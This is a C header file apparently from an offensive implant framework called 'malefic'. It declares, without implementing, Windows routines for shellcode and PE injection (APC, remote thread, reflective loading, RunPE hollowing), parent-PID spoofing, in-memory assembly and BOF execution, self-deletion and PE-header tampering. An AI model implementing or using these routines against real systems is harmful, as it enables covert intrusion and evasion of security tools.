malefic-crates/win/malefic_win_kit.h

// 对应 Rust 中的 RawString
typedef struct RawString {
    uint8_t *data;     // 指向字符串缓冲区
    size_t len;        // 实际长度
    size_t capacity;   // 容量（一般与内部分配空间有关）
} RawString;
// 对应 Rust 中 pub struct MaleficPipe
typedef struct MaleficPipe {
    const void *read;
    const void *write;
} MaleficPipe;
// 对应 Rust 中 pub struct DarkModule
typedef struct DarkModule {
    const void *module_base;
} DarkModule;
// 函数定义

RawString ApcLoaderInline(
    const uint8_t *bin,
    size_t bin_len,
    bool need_output,
    uint32_t loader_type
);
RawString ApcLoaderSacriface(
    const uint8_t *bin,
    size_t bin_len,
    char *sacrifice_commandline,
    uint32_t ppid,
    bool block_dll,
    bool need_output
);
void DeleteSelf(
    const uint8_t * stream,
    uint32_t stream_len
);
RawString InjectRemoteThread(
    const uint8_t *bin,
    size_t bin_len,
    uint32_t pid
);
const void* MaleficLoadLibrary(
    uint32_t flags,
    const uint16_t *buffer,
    const void *file_buffer,
    size_t len,
    const uint8_t *name
);
const void* MaleficGetFuncAddrWithModuleBaseDefault(
    const void *module_base,
    const uint8_t *func_name,
    size_t func_name_len
);
RawString ReflectiveLoader(
    const uint8_t *start_commandline,
    size_t start_commandline_len,
    const uint8_t *reflective_loader_name,
    size_t reflective_loader_name_len,
    const uint8_t *data,
    size_t data_len,
    const uint8_t *param,
    size_t param_len,
    uint32_t ppid,
    bool block_dll,
    uint32_t timeout,
    bool is_need_output
);
RawString InlinePE(
    const uint8_t *bin,
    size_t bin_size,
    const uint16_t *magic,
    const uint32_t *signature,
    const uint8_t *commandline,
    size_t commandline_len,
    const uint8_t *entrypoint,
    size_t entrypoint_len,
    bool is_dll,
    bool is_need_output,
    uint32_t timeout,
    uint32_t delay
);
RawString RunPE(
    const uint8_t *start_commandline,
    size_t start_commandline_len,
    const uint8_t *hijack_commandline,
    size_t hijack_commandline_len,
    const uint8_t *data,
    size_t data_size,
    const uint8_t *entrypoint,
    size_t entrypoint_len,
    const uint8_t *args,
    size_t args_len,
    bool is_x86,
    uint32_t pid,
    bool block_dll,
    bool need_output
);
RawString RunSacrifice(
    uint8_t *application_name,
    const uint8_t *start_commandline,
    size_t start_commandline_len,
    const uint8_t *hijack_commandline,
    size_t hijack_commandline_len,
    uint32_t parent_id,
    bool need_output,
    bool block_dll
);
RawString MaleficExecAssembleInMemory(
    const uint8_t *data,
    size_t data_len,
    const uint8_t *const *args,
    size_t args_len
);
RawString MaleficBofLoader(
    const uint8_t *buffer,
    size_t buffer_len,
    const uint8_t *const *arguments,
    size_t arguments_size,
    const uint8_t *entrypoint_name
);
uint8_t HijackCommandLine(
    const uint8_t *commandline,
    size_t commandline_len
);
RawString MaleficPwshExecCommand(
    const uint8_t *command,
    size_t command_len
);
const void* PELoader(
    const void *handle,
    const void *base_addr,
    size_t size,
    bool need_modify_magic,
    bool need_modify_sign,
    uint16_t magic,
    uint32_t signature
);
void UnloadPE(const void *module);
// ============================================================
// Core Memory APIs
// ============================================================

void* MVirtualAlloc(void *ptr, size_t size, uint32_t flags, uint32_t protect);
void* MVirtualAllocEx(const void *handle, void *ptr, size_t size, uint32_t flags, uint32_t protect);
bool MVirtualProtect(void *ptr, size_t size, uint32_t new_protect, uint32_t *old_protect);
bool MVirtualProtectEx(const void *handle, void *ptr, size_t size, uint32_t new_protect, uint32_t *old_protect);
bool MWriteProcessMemory(const void *handle, void *ptr, const void *data, size_t len);
bool MReadProcessMemory(const void *handle, void *ptr, void *data, size_t len);
int32_t MNtAllocateVirtualMemory(const void *handle, void **ptr, size_t *size, uint32_t allocation_type, uint32_t protect);
int32_t MNtWriteVirtualMemory(const void *handle, void *ptr, const void *data, size_t len);
int32_t MNtProtectVirtualMemory(const void *handle, void **ptr, size_t *size, uint32_t new_protect, uint32_t *old_protect);
int32_t MNtCreateSection(void **section_handle, size_t *size, uint32_t protect, uint32_t flags);
int32_t MNtMapViewOfSection(void **section_handle, const void *handle, void **ptr, size_t *size, uint32_t flags, uint32_t protect);
void* MHeapAlloc(size_t size, uint32_t flags);
void MRtlFillMemory(void *Destination, size_t Length, uint8_t Fill);
// ============================================================
// Core Process APIs
// ============================================================

void* MOpenProcess(uint32_t dwDesiredAccess, int32_t bInheritHandle, uint32_t dwProcessId);
bool MCreateProcessA(
    const int8_t *lpApplicationName,
    int8_t *lpCommandLine,
    void *lpProcessAttributes,
    void *lpThreadAttributes,
    int32_t bInheritHandles,
    uint32_t dwCreationFlags,
    void *lpEnvironment,
    const int8_t *lpCurrentDirectory,
    void *lpStartupInfo,
    void *lpProcessInformation
);
uint32_t MGetCurrentProcessId(void);
void* MGetCurrentThread(void);
bool MTerminateProcess(void *hProcess, uint32_t uExitCode);